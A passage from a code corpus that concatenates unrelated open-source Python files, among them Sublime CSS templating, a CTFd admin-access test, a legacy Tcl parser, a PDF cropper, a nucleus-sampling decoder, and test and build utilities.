"""Get the CSS key, value pairs for a rule."""
if NEW_SCHEMES:
general = self.view.style()
fg = general.get('foreground', '#000000')
bg = general.get('background', '#ffffff')
scope = self.view.style_for_scope(selector)
style = []
if scope['bold']:
style.append('bold')
if scope['italic']:
style.append('italic')
color = scope.get('foreground', fg)
bgcolor = scope.get('background', (None if explicit_background else bg))
else:
scope = self.guess_style(self.view, selector, explicit_background=explicit_background)
color = scope.fg_simulated
bgcolor = scope.bg_simulated
style = scope.style.split(' ')
css = []
if color and (key is None or key == 'color'):
css.append('color: %s' % color)
if bgcolor and (key is None or key == 'background-color'):
css.append('background-color: %s' % bgcolor)
for s in style:
if "bold" in s and (key is None or key == 'font-weight'):
css.append('font-weight: bold')
if "italic" in s and (key is None or key == 'font-style'):
css.append('font-style: italic')
if "underline" in s and (key is None or key == 'text-decoration') and False: # disabled
css.append('text-decoration: underline')
text = ';'.join(css)
if text:
text += ';'
return text
def apply_template(self, view, css, css_type, template_vars=None):
"""Apply template to css."""
self.view = view
if css_type not in (POPUP, PHANTOM):
return ''
self.css_type = css_type
self.variables = self.get_variables()
var = copy.copy(self.variables)
if template_vars and isinstance(template_vars, (dict, OrderedDict)):
self.plugin_vars = copy.deepcopy(template_vars)
else:
self.plugin_vars = {}
var.update(
{
'is_phantom': self.css_type == PHANTOM,
'is_popup': self.css_type == POPUP
}
)
return self.env.from_string(css).render(var=var, plugin=self.plugin_vars)
def get_pygments(style):
"""
Get pygments style.
Subllime CSS support is limited. It cannot handle well
things like: `.class1 .class2`, but it can handle things like:
`.class1.class2`. So we will not use things like `.highlight` in front.
We will first find {...} which has no syntax class. This will contain
our background and possibly foreground. If for whatever reason we
have no background or foreground, we will use `#000000` or `#ffffff`
respectively.
"""
try:
# Lets see if we can find the pygments theme
text = HtmlFormatter(style=style).get_style_defs('.dummy')
text = re_missing_semi_colon.sub('; }', text)
except Exception:
return ''
bg = None
fg = None
# Find {...} which has no syntax classes
m = re_base_colors.search(text)
if m:
# Find background
m1 = re_bgcolor.search(m.group(1))
if m1:
# Use `background-color` as it works better
# with Sublime CSS
bg = m1.group(1).replace('background', 'background-color')
# Find foreground
m1 = re_color.search(m.group(1))
if m1:
fg = m1.group(1)
# Use defaults if None found
if bg is None:
bg = 'background-color: #ffffff'
if fg is None:
fg = 'color: #000000'
# Reassemble replacing .highlight {...} with .codehilite, .inlinehilite {...}
# All other classes will be left bare with only their syntax class.
code_blocks = CODE_BLOCKS
if m:
css = clean_css(
(
text[:m.start(0)] +
(code_blocks % (bg, fg)) +
text[m.end(0):] +
'\n'
)
)
else:
css = clean_css(
(
(code_blocks % (bg, fg)) + '\n' + text + '\n'
)
)
return re_pygments_selectors.sub(r'.mdpopups .highlight \1', css)
|
tests/api/v1/user/test_admin_access.py | omertuc/CTFd | 3,592 | 12687968 | <reponame>omertuc/CTFd<filename>tests/api/v1/user/test_admin_access.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from tests.helpers import create_ctfd, destroy_ctfd, login_as_user, register_user
def test_api_hint_404():
"""Are admin protected resources accessible by admins/non-admins"""
app = create_ctfd()
endpoints = [
"/api/v1/configs/{}",
"/api/v1/challenges/types",
"/api/v1/statistics/teams",
"/api/v1/flags/{}",
"/api/v1/statistics/users/{}",
"/api/v1/configs",
"/api/v1/statistics/challenges/solves/percentages",
"/api/v1/statistics/scores/distribution",
"/api/v1/tags/{}",
"/api/v1/pages",
"/api/v1/files/{}",
"/api/v1/challenges/{}/tags",
"/api/v1/hints",
"/api/v1/challenges/{}/files",
"/api/v1/flags",
"/api/v1/submissions/{}",
"/api/v1/challenges/{}/flags",
"/api/v1/awards/{}",
"/api/v1/unlocks",
"/api/v1/challenges/{}/hints",
"/api/v1/statistics/submissions/{}",
"/api/v1/flags/types/{}",
"/api/v1/tags",
"/api/v1/statistics/challenges/{}",
"/api/v1/files",
"/api/v1/flags/types",
"/api/v1/submissions",
"/api/v1/pages/{}",
]
with app.app_context():
register_user(app)
client = login_as_user(app)
for endpoint in endpoints:
r = client.get(endpoint.format(1))
assert r.status_code == 302
assert r.location.startswith("http://localhost/login")
destroy_ctfd(app)
|
lib/TclUtil.py | aganders3/python-0.9.1 | 116 | 12687981 | # Utilities used by 'Tcl' emulator.
# Many functions in this file parse specific constructs from strings.
# In order to limit the number of slice operations (the strings can
# be very large), they always receive indices into the string that
# indicate the slice of the string that should be considered.
# The return value is in general another index, pointing to the first
# character in the string beyond the recognized construct.
# Errors are reported as exceptions (TclSyntaxError, TclMatchingError).
# A few functions have multiple return values.
# For efficiency, the Tcl "tokenizing" routines used pre-compiled
# regular expressions. This is less readable but should be much faster
# than scanning the string a character at a time.
#
# The global variables
# containing the compiled regexp's are named _foo_prog where foo is
# an indication of the function that uses them.
#
# The patterns always
# have the form <something>* so they always match at the start of the
# search buffer---maybe with the empty string. This makes it possible
# to use the expression "_foo_prog.exec(str, i)[0][1]" to find the first
# character beyond the matched string. Note that this may be beyond the
# end variable -- where this matters, "min(i, end)" is used.
# Constructs that cannot
# be recognized by a finite automaton (like matching braces) are scanned
# by a hybrid technique where the regular expression excludes the
# braces.
#
# Many regular expressions contain an expression that matches
# a Tcl backslash sequence as a subpart:
# \\\\C?M?(.|\n)
#
# This is a bit hard to
# read because the backslash contained in it must be doubled twice:
# once to get past Python's backslash mechanism, once to get past that
# of regular expressions. It uses (.|\n) to match absolutely
# *every character*, becase the MULTILINE regular expression package does
# not accept '\n' as a match for '.'.
#
# There is also a simplification in the pattern for backslashes:
# *any* single character following a backslash is escaped,
# so hex and octal
# excapes are not scanned fully. The forms \Cx, \Mx and \CMx are
# scanned correctly, as these may hide a special character.
# (This does not invalidate the recognition of strings, although the
# match is effectuated in a different way than by the Backslash function.)
import regexp
# Exceptions raised for various error conditions.
TclAssertError = 'Tcl assert error'
TclSyntaxError = 'Tcl syntax error'
TclRuntimeError = 'Tcl runtime error'
TclMatchingError = 'Tcl matching error'
# Find a variable name.
# A variable name is either a (possiblly empty) sequence of letters,
# digits and underscores, or anything enclosed in matching braces.
# Return the index past the end of the name.
_varname_prog = regexp.compile('[a-zA-Z0-9_]*')
def FindVarName(str, i, end):
if i < end and str[i] = '{': return BalanceBraces(str, i, end)
i = _varname_prog.exec(str, i)[0][1]
return min(i, end)
# Split a list into its elements.
# Return a list of elements (strings).
def SplitList(str):
i, end = 0, len(str)
list = []
while 1:
i = SkipSpaces(str, i, end)
if i >= end: break
j = i
i = FindNextElement(str, i, end)
if str[j] = '{' and str[i-1] = '}':
element = str[j+1:i-1]
else:
element = Collapse(str[j:i])
list.append(element)
return list
# Find the next element from a list.
_element_prog = regexp.compile('([^ \t\n\\]+|\\\\C?M?(.|\n))*')
def FindNextElement(str, i, end):
if i < end and str[i] = '{':
i = BalanceBraces(str, i, end)
if i < end and str[i] not in ' \t\n':
raise TclSyntaxError, 'Garbage after } in list'
return i
i = _element_prog.exec(str, i)[0][1]
return min(i, end)
# Copy a string, expanding all backslash sequences.
_collapse_prog = regexp.compile('(\n|[^\\]+)*')
def Collapse(str):
if '\\' not in str: return str
i, end = 0, len(str)
result = ''
while i < end:
j = _collapse_prog.exec(str, i)[0][1]
j = min(j, end)
result = result + str[i:j]
if j >= end: break
c = str[j]
if c <> '\\': raise TclAssertError, 'collapse error'
x, i = Backslash(str, j, end)
result = result + x
return result
# Find the next full command.
# Return a list of begin, end indices of words in the string,
# and an index pointing just after the terminating newline or
# semicolon.
# Initial spaces are skipped.
# If the command begins with '#', it is considered empty and
# characters until '\n' are skipped.
_eol_prog = regexp.compile('[^\n]*')
def FindNextCommand(str, i, end, bracketed):
i = SkipSpaces(str, i, end)
if i >= end: return [], end
if str[i] = '#':
i = _eol_prog.exec(str, i)
i = min(i, end)
if i < end and str[i] = '\n': i = i+1
return [], i
if bracketed: terminators = [';']
else: terminators = [';', '\n']
list = []
while i < end:
j = FindNextWord(str, i, end)
word = str[i:j]
if word in terminators:
i = j
break
if word <> '\n': list.append(i, j)
i = SkipSpaces(str, j, end)
return list, i
# Find the next word of a command.
# Semicolon and newline terminate words but also count as a word
# themselves.
# The start index must point to the start of the word.
_word_prog = regexp.compile('([^ \t\n;[\\]+|\\\\C?M?(.|\n))*')
def FindNextWord(str, i, end):
if i >= end: return end
if str[i] in '{"':
if str[i] = '{': i = BalanceBraces(str, i, end)
else: i = BalanceQuotes(str, i, end)
if i >= end or str[i] in ' \t\n;': return min(i, end)
raise TclSyntaxError, 'Garbage after } or "'
begin = i
while i < end:
i = _word_prog.exec(str, i)[0][1]
if i >= end:
i = end
break
c = str[i]
if c in ' \t': break
if c in ';\n':
if i = begin: i = i+1
break
if c = '[': i = BalanceBrackets(str, i, end)
else: raise TclAssertError, 'word error'
return i
# Parse balanced brackets from str[i:end].
# str[i] must be '['.
# Returns end such that str[i:end] ends with ']'
# and contains balanced braces and brackets.
_brackets_prog = regexp.compile('([^][{\\]+|\n|\\\\C?M?(.|\n))*')
def BalanceBrackets(str, i, end):
if i >= end or str[i] <> '[':
raise TclAssertError, 'BalanceBrackets'
nesting = 0
while i < end:
i = _brackets_prog.exec(str, i)[0][1]
if i >= end: break
c = str[i]
if c = '{': i = BalanceBraces(str, i, end)
else:
i = i+1
if c = '[': nesting = nesting + 1
elif c = ']':
nesting = nesting - 1
if nesting = 0: return i
else: raise TclAssertError, 'brackets error'
raise TclMatchingError, 'Unmatched bracket ([)'
# Parse balanced braces from str[i:end].
# str[i] must be '{'.
# Returns end such that str[i:end] ends with '}'
# and contains balanced braces.
_braces_prog = regexp.compile('([^{}\\]+|\n|\\\\C?M?(.|\n))*')
def BalanceBraces(str, i, end):
if i >= end or str[i] <> '{':
raise TclAssertError, 'BalanceBraces'
nesting = 0
while i < end:
i = _braces_prog.exec(str, i)[0][1]
if i >= end: break
c = str[i]
i = i+1
if c = '{': nesting = nesting + 1
elif c = '}':
nesting = nesting - 1
if nesting = 0: return i
else: raise TclAssertError, 'braces error'
raise TclMatchingError, 'Unmatched brace ({)'
# Parse double quotes from str[i:end].
# str[i] must be '"'.
# Returns end such that str[i:end] ends with an unescaped '"'.
_quotes_prog = regexp.compile('([^"\\]+|\n|\\\\C?M?(.|\n))*')
def BalanceQuotes(str, i, end):
if i >= end or str[i] <> '"':
raise TclAssertError, 'BalanceQuotes'
i = _quotes_prog.exec(str, i+1)[0][1]
if i < end and str[i] = '"': return i+1
raise TclMatchingError, 'Unmatched quote (")'
# Static data used by Backslash()
_bstab = {}
_bstab['n'] = '\n'
_bstab['r'] = '\r'
_bstab['t'] = '\t'
_bstab['b'] = '\b'
_bstab['e'] = '\033'
_bstab['\n'] = ''
for c in ' {}[]$";\\': _bstab[c] = c
del c
# Backslash interpretation.
# First character must be a backslash.
# Return a pair (<replacement string>, <end of sequence>).
# Unrecognized or incomplete backslash sequences are not errors;
# this takes only the backslash itself off the string.
def Backslash(str, i, end):
if i >= end or str[i] <> '\\':
raise TclAssertError, 'Backslash'
i = i+1
if i = end: return '\\', i
c = str[i]
i = i+1
if _bstab.has_key(c): return _bstab[c], i
if c = 'C':
if i = end: return '\\', i-1
c = str[i]
i = i+1
if c = 'M':
if i = end: return '\\', i-2
c = str[i]
i = i+1
x = ord(c) % 040 + 0200
else:
x = ord(c) % 040
return chr(x), i
elif c = 'M':
if i = end: return '\\', i-1
c = str[i]
i = i+1
x = ord(c)
if x < 0200: x = x + 0200
return chr(x), i
elif c and c in '0123456789':
x = ord(c) - ord('0')
end = min(end, i+2)
while i < end:
c = str[i]
if c not in '0123456789': break
i = i+1
x = x*8 + ord(c) - ord('0')
return ord(x), i
else:
# Not something that we recognize
return '\\', i-1
# Skip over spaces and tabs (but not newlines).
_spaces_prog = regexp.compile('[ \t]*')
def SkipSpaces(str, i, end):
i = _spaces_prog.exec(str, i)[0][1]
return min(i, end)
# Concatenate the elements of a list with intervening spaces.
def Concat(argv):
result = ''
sep = ''
for arg in argv:
result = result + (sep + arg)
sep = ' '
return result
# Concatenate list elements, adding braces etc. to make them parseable
# again with SplitList.
def BuildList(argv):
result = ''
sep = ''
for arg in argv:
arg = AddBraces(arg)
result = result + (sep + arg)
sep = ' '
return result
# Add braces around a string if necessary to make it parseable by SplitList.
def AddBraces(str):
# Special case for empty string
if str = '': return '{}'
# See if it contains balanced braces
res = '{' + str + '}'
if TryNextElement(res):
# See if it would survive unquoted
# XXX should escape [] and $ as well???
if TryNextElement(str) and Collapse(str) = str: return str
# No -- return with added braces
return res
# Unbalanced braces. Add backslashes before suspect characters
res = ''
for c in str:
if c in '$\\[]{} ;': c = '\\' + c
elif c = '\n': c = '\\n'
elif c = '\t': c = '\\t'
res = res + c
return res
def TryNextElement(str):
end = len(str)
try:
i = FindNextElement(str, 0, end)
return i = end
except (TclSyntaxError, TclMatchingError):
return 0
|
recipes/Python/576837_Crop_PDF_File_with_pyPdf/recipe-576837.py | tdiprima/code | 2,023 | 12687989 | <filename>recipes/Python/576837_Crop_PDF_File_with_pyPdf/recipe-576837.py
#! /usr/bin/python
# Originally found on http://www.mobileread.com/forums/showthread.php?t=25565
import getopt, sys
from pyPdf import PdfFileWriter, PdfFileReader
def usage ():
print """sjvr767\'s PDF Cropping Script.
Example:
my_pdf_crop.py -s -p 0.5 -i input.pdf -o output.pdf
my_pdf_crop.py --skip --percent 0.5 -input input.pdf -output output.pdf
\n
REQUIRED OPTIONS:
-p\t--percent
The factor by which to crop. Must be positive and less than or equal to 1.
-i\t--input
The path to the file to be cropped.
\n
OPTIONAL:
-s\t--skip
Skip the first page. Ouptut file will not contain the first page of the input file.
-o\t--output
Specify the name and path of the output file. If none specified, the script appends \'cropped\' to the file name.
-m\t--margin
Specify additional absolute cropping, for fine tuning results.
\t-m "left top right bottom"
"""
sys.exit(0)
def cut_length(dictionary, key, factor):
cut_factor = 1-factor
cut = float(dictionary[key])*cut_factor
cut = cut / 4
return cut
def new_coords(dictionary, key, cut, margin, code = "tl"):
if code == "tl":
if key == "x":
return abs(float(dictionary[key])+(cut+margin["l"]))
else:
return abs(float(dictionary[key])-(cut+margin["t"]))
elif code == "tr":
if key == "x":
return abs(float(dictionary[key])-(cut+margin["r"]))
else:
return abs(float(dictionary[key])-(cut+margin["t"]))
elif code == "bl":
if key == "x":
return abs(float(dictionary[key])+(cut+margin["l"]))
else:
return abs(float(dictionary[key])+(cut+margin["b"]))
else:
if key == "x":
return abs(float(dictionary[key])-(cut+margin["r"]))
else:
return abs(float(dictionary[key])+(cut+margin["b"]))
try:
opts, args = getopt.getopt(sys.argv[1:], "sp:i:o:m:", ["skip", "percent=", "input=", "output=", "margin="])
except getopt.GetoptError, err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
skipone = 0
for a in opts[:]:
if a[0] == '-s' or a[0]=='--skip':
skipone = 1
factor = 0.8 #default scaling factor
for a in opts[:]:
if a[0] == '-p' or a[0]=='--factor':
if a[1] != None:
try:
factor = float(a[1])
except TypeError:
print "Factor must be a number."
sys.exit(2) #exit if no appropriate input file
input_file = None #no defualt input file
for a in opts[:]:
if a[0] == '-i' or a[0]=='--input':
if a[1] != None:
try:
if a[1][-4:]=='.pdf':
input_file = a[1]
else:
print "Input file must be a PDF."
sys.exit(2) #exit if no appropriate input file
except TypeError:
print "Input file must be a PDF."
sys.exit(2) #exit if no appropriate input file
except IndexError:
print "Input file must be a PDF."
sys.exit(2) #exit if no appropriate input file
else:
print "Please speicfy an input file."
sys.exit(2) #exit if no appropriate input file
output_file = "%s_cropped.pdf" %input_file[:-4] #default output
for a in opts[:]:
if a[0] == '-o' or a[0]=='--output':
if a[1]!= None:
try:
if a[1][-4:]=='.pdf':
output_file = a[1]
else:
print "Output file must be a PDF."
except TypeError:
print "Output file must be a PDF."
except IndexError:
print "Output file must be a PDF."
margin = {"l": 0, "t": 0, "r": 0, "b": 0}
for a in opts[:]:
if a[0] == '-m' or a[0]=='--margin':
if a[1]!= None:
m_temp = a[1].strip("\"").split()
margin["l"] = float(m_temp[0])
margin["t"] = float(m_temp[1])
margin["r"] = float(m_temp[2])
margin["b"] = float(m_temp[3])
else:
print "Error"
input1 = PdfFileReader(file(input_file, "rb"))
output = PdfFileWriter()
outputstream = file(output_file, "wb")
pages = input1.getNumPages()
top_right = {'x': input1.getPage(1).mediaBox.getUpperRight_x(), 'y': input1.getPage(1).mediaBox.getUpperRight_y()}
top_left = {'x': input1.getPage(1).mediaBox.getUpperLeft_x(), 'y': input1.getPage(1).mediaBox.getUpperLeft_y()}
bottom_right = {'x': input1.getPage(1).mediaBox.getLowerRight_x(), 'y': input1.getPage(1).mediaBox.getLowerRight_y()}
bottom_left = {'x': input1.getPage(1).mediaBox.getLowerLeft_x(), 'y': input1.getPage(1).mediaBox.getLowerLeft_y()}
print('Page dim.\t%f by %f' %(top_right['x'], top_right['y']))
cut = cut_length(top_right, 'x', factor)
new_tr = (new_coords(top_right, 'x', cut, margin, code = "tr"), new_coords(top_right, 'y', cut, margin, code = "tr"))
new_br = (new_coords(bottom_right, 'x', cut, margin, code = "br"), new_coords(bottom_right, 'y', cut, margin, code = "br" ))
new_tl = (new_coords(top_left, 'x', cut, margin, code = "tl"), new_coords(top_left, 'y', cut, margin, code = "tl"))
new_bl = (new_coords(bottom_left, 'x', cut, margin, code = "bl"), new_coords(bottom_left, 'y', cut, margin, code = "bl"))
if skipone == 0:
for i in range(0, pages):
page = input1.getPage(i)
page.mediaBox.upperLeft = new_tl
page.mediaBox.upperRight = new_tr
page.mediaBox.lowerLeft = new_bl
page.mediaBox.lowerRight = new_br
output.addPage(page)
else:
for i in range(1, pages):
page = input1.getPage(i)
page.mediaBox.upperLeft = new_tl
page.mediaBox.upperRight = new_tr
page.mediaBox.lowerLeft = new_bl
page.mediaBox.lowerRight = new_br
output.addPage(page)
output.write(outputstream)
outputstream.close()
|
pmdarima/preprocessing/endog/base.py | tuomijal/pmdarima | 736 | 12688013 | <reponame>tuomijal/pmdarima<filename>pmdarima/preprocessing/endog/base.py
# -*- coding: utf-8 -*-
import abc
from ..base import BaseTransformer
class BaseEndogTransformer(BaseTransformer, metaclass=abc.ABCMeta):
"""A base class for endogenous array transformers"""
def _check_y_X(self, y, X):
"""Check the endog and exog arrays"""
y, X = super(BaseEndogTransformer, self)._check_y_X(y, X)
if y is None:
raise ValueError("y must be non-None for endogenous transformers")
return y, X
@abc.abstractmethod
def inverse_transform(self, y, X=None, **kwargs): # TODO: remove kwargs
"""Inverse transform a transformed array
Inverse the transformation on the transformed array.
Parameters
----------
y : array-like or None, shape=(n_samples,)
The transformed endogenous (time-series) array.
X : array-like or None, shape=(n_samples, n_features), optional
The exogenous array of additional covariates. Not used for
endogenous transformers. Default is None, and non-None values will
serve as pass-through arrays.
Returns
-------
y : array-like or None
The inverse-transformed y array
X : array-like or None
The inverse-transformed exogenous array
"""
|
virtex/utils/nucleus_sampling.py | Muflhi01/virtex | 523 | 12688032 | <reponame>Muflhi01/virtex
r"""
Nucleus Sampling was introduced in the paper
`The Curious Case of Neural Text Degeneration <https://arxiv.org/abs/1904.09751>`_.
If you take it from here, make sure to cite them:
.. code-block:: text
@inproceedings{,
title={The Curious Case of Neural Text Degeneration},
author={<NAME> and <NAME> and <NAME> and <NAME> and <NAME>},
journal={ICLR},
year={2020}
}
Some core parts of this code are adapted with minor modifications from Thomas Wolf's
gist: https://gist.githubusercontent.com/thomwolf/1a5a29f6962089e871b94cbd09daf317
"""
from typing import Callable, List, Tuple
import torch
import torch.nn.functional as F
class AutoRegressiveNucleusSampling(object):
r"""
Implements the nucleus sampling for decoding captions. This class only works
for auto-regressive models (Transformer-like), not recurrent models (LSTM-like).
Args:
eos_index: The index of the end token (``[EOS]``) in vocabulary.
max_steps: The maximum number of decoding steps.
nucleus_size: Size of top-K nucleus for sampling.
"""
def __init__(
self,
eos_index: int,
max_steps: int = 50,
nucleus_size: float = 0.9,
):
super().__init__()
self._eos_index = eos_index
self.max_steps = max_steps
self.nucleus_size = nucleus_size
def search(
self, start_predictions: torch.Tensor, step: Callable[..., torch.Tensor]
) -> Tuple[torch.Tensor, None]:
batch_size = start_predictions.size()[0]
# List of `(batch_size, )` tensors. One for each timestep.
# This includes the start-of-sentence tokens, unlike the implementation
# in `AutoregressiveBeamSearch`. We will remove them in the end.
predictions: List[torch.Tensor] = [start_predictions]
for timestep in range(self.max_steps):
# Get the predictions from last timestep (most recent).
# shape: (batch_size, )
last_predictions = predictions[-1]
# If every predicted token from the last step is end-of-sentence token,
# then we can stop early.
if (last_predictions == self._eos_index).all():
break
# Combine step predictions made so far into one tensor. This is our
# "partial" caption input to the transformer.
# shape: (batch_size, timestep + 1)
predictions_so_far = torch.stack(predictions).permute(1, 0)
# Take a step, get the distribution of logits from next timestep.
# shape: (batch_size, num_classes)
current_logits = step(predictions_so_far)
# Sort logits in descending order to determine the nucleus.
sorted_logits, sorted_idx = torch.sort(current_logits, descending=True)
# Get cumulative softmax probabilites. For every instance in batch, a
# variable amount of tokens (N) will consitute the nucleus.
# shape: (batch_size, num_classes)
cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Determine indices of tokens at the tail of distribution. These will be
# removed from the nucleus.
sorted_idx_to_remove = cumulative_probs > self.nucleus_size
# Shift the indices to the right to keep the first token outside nucleus.
sorted_idx_to_remove[..., 1:] = sorted_idx_to_remove[..., :-1].clone()
sorted_idx_to_remove[..., 0] = 0
# Set logits to large negative value to avoid sampling them. Iterate over
# the batch of examples.
for t in range(current_logits.size()[0]):
idx_to_remove = sorted_idx[t][sorted_idx_to_remove[t]]
current_logits[t][idx_to_remove] = -1e12
# Set logits for last predicted token to a large negative value to
# avoid repetition.
current_logits[t][last_predictions[t]] = -1e12
# Sample from the filtered distribution.
# shape: (batch_size, num_classes)
current_probs = F.softmax(current_logits, dim=-1)
# shape: (batch_size, )
current_predictions = torch.multinomial(current_probs, 1)
current_predictions = current_predictions.view(batch_size)
# Set current predicted tokens to be end-of-sentence for instances where
# last prediction was also end-of-sentence token.
current_predictions[last_predictions == self._eos_index] = self._eos_index
predictions.append(current_predictions)
# Remove start-of-sentence token from predictions, and collect them together.
# shape: (batch_size, max_steps) .. or could be less than max_steps.
all_predictions = torch.stack(predictions[1:]).permute(1, 0)
# We don't return any logprobs of generated sequence with nucleus sampling,
# unlike `AutoregressiveBeamSearch`.
return all_predictions, None
|
scripts/irods/test/test_irule.py | JustinKyleJames/irods | 333 | 12688045 | from __future__ import print_function
import sys
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
from .. import lib
from .. import paths
from .. import test
from .resource_suite import ResourceBase
from ..configuration import IrodsConfig
class Test_Irule(ResourceBase, unittest.TestCase):
plugin_name = IrodsConfig().default_rule_engine_plugin
class_name = 'Test_Irule'
def setUp(self):
super(Test_Irule, self).setUp()
def tearDown(self):
super(Test_Irule, self).tearDown()
@unittest.skipIf(test.settings.TOPOLOGY_FROM_RESOURCE_SERVER or plugin_name=='irods_rule_engine_plugin-python',
'Skip for topology testing from resource server: reads server log')
@unittest.skipUnless(plugin_name == 'irods_rule_engine_plugin-irods_rule_language',
'tests cache update - only applicable for irods_rule_language REP')
def test_irule_printHello_in_serverLog_4189(self):
svr_log_path = paths.server_log_path()
initial_log_size = lib.get_file_size_by_path( svr_log_path )
_, _ ,rc = self.admin.run_icommand(['irule', 'printHello', 'hi', 'null'])
# With the above invalid parameter ("hi"), irule should return an error code to OS...
self.assertNotEqual (rc, 0)
# and shouldn't run the requested operation: i.e., writing to the log.
lib.delayAssert(
lambda: lib.log_message_occurrences_equals_count(
msg='\nHello',
count=0,
start_index=initial_log_size))
@unittest.skipUnless(plugin_name == 'irods_rule_engine_plugin-irods_rule_language',
'tests cache update - only applicable for irods_rule_language REP')
def test_irule_printVariables_on_stdout_4189(self):
stdout, stderr, rc = self.admin.run_icommand(['irule', 'writeLine("stdout","[*a][*b]")', '*a=1%*b=2', 'ruleExecOut'])
self.assertEqual (rc, 0)
self.assertIn ("[1][2]", stdout)
stdout, stderr, rc = self.admin.run_icommand(['irule', 'writeLine("stdout","[*a]")', '*a=1%badInput', 'ruleExecOut'])
self.assertNotIn( "[1]", stdout )
self.assertIn( "badInput format error", stderr )
self.assertNotEqual( rc, 0 )
|
test/utils/run.py | dburkhardt/SingleCellOpenProblems | 134 | 12688047 | from . import streams
import logging
import subprocess
import sys
import time
log = logging.getLogger("openproblems")
def format_error_timeout(process, timeout, stream):
"""Format subprocess output on timeout."""
return "{}\nTimed out after {} s\n\n{}".format(
" ".join(process.args),
timeout,
streams.NonBlockingStreamReader(stream).read().decode("utf-8"),
)
def _format_error(process, stream):
"""Format subprocess output."""
return "{}\nReturn code {}\n\n{}".format(
" ".join(process.args), process.returncode, stream.decode("utf-8")
)
def format_error_stderr(process):
"""Format subprocess output from stderr."""
return _format_error(process, process.stderr)
def format_error_stdout(process):
"""Format subprocess output from stdout."""
return _format_error(process, process.stdout)
def git_file_age(filename):
"""Get the age of a file's last git commit."""
git_age = (
run(
["git", "log", "-1", '--format="%ad"', "--date=unix", "--", filename],
return_stdout=True,
)
.strip()
.replace('"', "")
)
if git_age == "":
return 0
else:
return int(git_age)
def _run_failed(process, error_raises, format_error):
raise error_raises(format_error(process))
def run(
command,
shell=False,
print_stdout=False,
return_stdout=False,
return_code=False,
error_raises=AssertionError,
format_error=None,
timeout=3600,
):
"""Run subprocess.
Parameters
----------
command : list of str
shell : bool
Run command in a new shell
print_stdout : bool
Print subprocess stdout to sys.stdout
return_stdout : bool
Return subprocess stdout
return_code : bool
Return subprocess exit code
error_raises : Exception
Which exception to raise on failure
format_error : callable
Function to call to generate error message. If None, chooses from
`format_error_stderr` and `format_error_stdout` automatically.
"""
if return_stdout and print_stdout:
raise NotImplementedError
elif return_stdout:
stderr = subprocess.PIPE
if format_error is None:
format_error = format_error_stderr
else:
stderr = subprocess.STDOUT
if format_error is None:
format_error = format_error_stdout
log.debug("Running subprocess: {}".format(command))
p = subprocess.Popen(command, shell=shell, stdout=subprocess.PIPE, stderr=stderr)
if timeout is not None:
runtime = 0
if p.poll() is None:
time.sleep(1)
runtime += 1
if runtime > timeout:
raise RuntimeError(
format_error_timeout(
p, timeout, p.stderr if stderr is subprocess.PIPE else p.stdout
)
)
log.debug("Awaiting subprocess completion")
if print_stdout:
while True:
output = p.stdout.readline().decode("utf-8")
if output == "" and p.poll() is not None:
break
if output:
print(output.strip())
sys.stdout.flush()
else:
p.wait()
log.debug("Subprocess complete")
p.stdout, p.stderr = p.communicate()
output = []
if return_stdout:
output.append(p.stdout.decode("utf-8"))
if return_code:
output.append(p.returncode)
if not return_code and not p.returncode == 0:
_run_failed(p, error_raises, format_error)
if output:
return output[0] if len(output) == 1 else tuple(output)
|
tasks.py | vtemian/django-registration | 925 | 12688064 | <reponame>vtemian/django-registration<gh_stars>100-1000
from invoke import run
from invoke import task
@task
def clean(all=False):
if all:
flag = "--all"
else:
flag = ""
run("python setup.py clean {}".format(flag))
@task
def build(docs=False):
run("python setup.py build")
if docs:
run("sphinx-build docs docs/_build")
@task
def test():
run("python setup.py test")
@task
def lint():
run("rst2html.py README.rst > /dev/null")
run("flake8 registration")
run("isort --recursive --check-only registration")
|
src/custom_ops/custom_ops_factory.py | xiaoyuliu/AttentionalPoolingAction | 270 | 12688089 | import os
import json
from collections import OrderedDict
import numpy as np
import tensorflow as tf
cur_path = os.path.realpath(__file__)
ROOT_PATH = os.path.dirname(cur_path)
# add any new ops under the following
pose_to_heatmap_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'pose_to_heatmap.so')).pose_to_heatmap
zero_out_channels_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'zero_out_channels.so')).zero_out_channels
render_pose_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'render_pose.so')).render_pose
render_objects_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'render_objects.so')).render_objects
def pose_to_heatmap(*args, **kwargs):
with tf.variable_scope('pose_to_heatmap_pyWrapper'):
pose_img, pose_valid = pose_to_heatmap_fn(*args, **kwargs)
out_channels = kwargs['out_channels']
pose_img.set_shape((None, None, out_channels))
pose_valid.set_shape((out_channels,))
pose_img *= 255.0
pose_img = tf.cast(pose_img, tf.uint8)
return pose_img, pose_valid
def zero_out_channels(*args, **kwargs):
with tf.variable_scope('zero_out_channels_pyWrapper'):
return zero_out_channels_fn(*args, **kwargs)
def render_pose(*args, **kwargs):
with tf.variable_scope('render_pose_pyWrapper'):
out_channels = 3
if kwargs['out_type'] == 'rgb':
kwargs['out_type'] = 1
out_channels = 3
elif kwargs['out_type'] == 'split-channel':
kwargs['out_type'] = 2
out_channels = 18 # number of limbs
img = render_pose_fn(*args, **kwargs)
img *= 255.0
img = tf.cast(img, tf.uint8)
img.set_shape((None, None, out_channels))
return img
# from render_pose.cc
mpii_to_coco = OrderedDict([
(9, 0),
(8, 1),
(12, 2),
(11, 3),
(10, 4),
(13, 5),
(14, 6),
(15, 7),
(2, 8),
(1, 9),
(0, 10),
(3, 11),
(4, 12),
(5, 13),
])
def read_json_pose_fn(fpath):
try:
with open(fpath, 'r') as fin:
data = json.load(fin)
except:
print('Unable to open file {}'.format(fpath))
return -np.ones((16*3,)).astype('int64')
res = []
for body in data['bodies']:
mpii_joints = -np.ones((16, 3))
joints = np.array(body['joints'])
joints = np.reshape(joints, (-1, 3))
joints[joints[..., :] <= 0] = -1
mpii_joints[np.array(mpii_to_coco.keys()), :] = \
joints[np.array(mpii_to_coco.values()), :]
res += mpii_joints.reshape((-1,)).tolist()
res = np.array(res).astype('int64')
return res
def read_json_pose(*args):
return tf.py_func(read_json_pose_fn, args, tf.int64)
def render_objects(*args, **kwargs):
with tf.variable_scope('render_objects_pyWrapper'):
